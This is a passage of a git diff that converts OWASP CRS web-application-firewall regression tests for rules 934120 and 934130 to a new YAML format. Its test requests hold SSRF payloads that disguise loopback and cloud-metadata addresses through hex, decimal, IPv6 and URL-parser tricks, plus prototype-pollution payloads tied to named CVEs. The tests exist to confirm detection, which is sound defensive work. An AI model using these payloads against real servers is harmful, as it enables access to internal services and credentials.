+ Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=rtmp://017700000001" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 29 desc: SSRF - 32-Bit Hex conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=gopher://0x7f000001" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=gopher://0x7f000001" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 30 desc: SSRF - IPv6, first byte full, rest compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[a::]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[a::]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 31 desc: SSRF - IPv6, first byte full, last byte full, rest compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[a::b]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[a::b]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 32 desc: SSRF - IPv6, compressed in the middle stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" + 
version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 33 desc: SSRF - IPv6, link-local unicast with zone ID, compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[fe80::%zone1]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[fe80::%zone1]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 34 desc: SSRF - IPv6, link-local unicast with zone ID, full stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 35 
desc: SSRF - IPv6, IPv4 mapped stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 36 desc: SSRF - IPv6, IPv4 compatible stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 37 desc: SSRF - URL bypass, IP + domain stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 38 desc: SSRF - URL bypass, domain + IP stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 39 desc: SSRF - Enclosed alphanumerics, dots stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169。254。169。254/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169。254。169。254/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 40 desc: SSRF - IPv6, the unspecified address stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[::]/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[::]/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 41 desc: SSRF - Glibc NSS features stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 42 desc: SSRF - Glibc NSS features stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 43 desc: SSRF - Input variable coverage test (Dotless decimal) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Cookie: ssrf=http://2852039166/ - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Cookie: http://2852039166/ - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: POST - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="file"; filename="http://2852039166/?.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Cookie: ssrf=http://2852039166/ + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Cookie: http://2852039166/ + method: "GET" + uri: "/get" + 
version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: POST + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="file"; filename="http://2852039166/?.txt" + Content-Type: text/plain - My epic SSRF attempt + My epic SSRF attempt - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: application/xml 
- method: POST - uri: "/post" - data: "http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-44 + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?http://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: application/xml + method: POST + uri: "/post" + data: "http://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 44 desc: SSRF - local_file:// url scheme - Dotless decimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: 
en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=local_file://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=local_file://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml index 3a667cc5a..42ff4adc5 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml 
@@ -1,220 +1,218 @@ --- meta: author: "lifeforms, azurit" - enabled: true - name: "934130.yaml" - description: "Tests for rule 934130" +rule_id: 934130 tests: - - test_title: 934130-1 + - test_id: 1 desc: negative test case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=proto" - version: HTTP/1.0 - output: - no_log_contains: id "934130" - - test_title: 934130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=proto" + version: HTTP/1.0 + output: + log: + no_expect_ids: [934130] + - test_id: 2 desc: positive test case with JSON POST stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} - output: - log_contains: id "934130" - - test_title: 934130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} + output: + log: + expect_ids: [934130] + - test_id: 3 desc: positive test case, CVE-2021-20083 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[test]=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?__proto__[test]=test" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 4 desc: positive test case, CVE-2021-20084, 1/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__.test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__.test=test" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 5 desc: positive test case, CVE-2021-20084, 2/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor.prototype.test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor.prototype.test=test" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 6 desc: positive test case with space evasion, CVE-2021-20084, 2/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor.prototype.%20test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor.prototype.%20test=test" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 7 desc: positive test case with GET parameter, jQuery $.get stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[context]=" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[context]=" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 8 desc: positive test case with GET parameter, V4Fire Core Library stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 9 desc: positive test case with GET parameter, analytics-utils < 1.0.3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 10 desc: positive test case with GET parameter, jQuery $.get stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?__proto__[jquery]=x" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[jquery]=x" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 11 desc: positive test case with GET parameter, Vue.js stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 12 desc: "Detect example payload __proto__... submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__proto__.foo=bar - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934130" - - test_title: 934130-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=__proto__.foo=bar + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934130] + - test_id: 13 desc: "Detect example payload __proto__... 
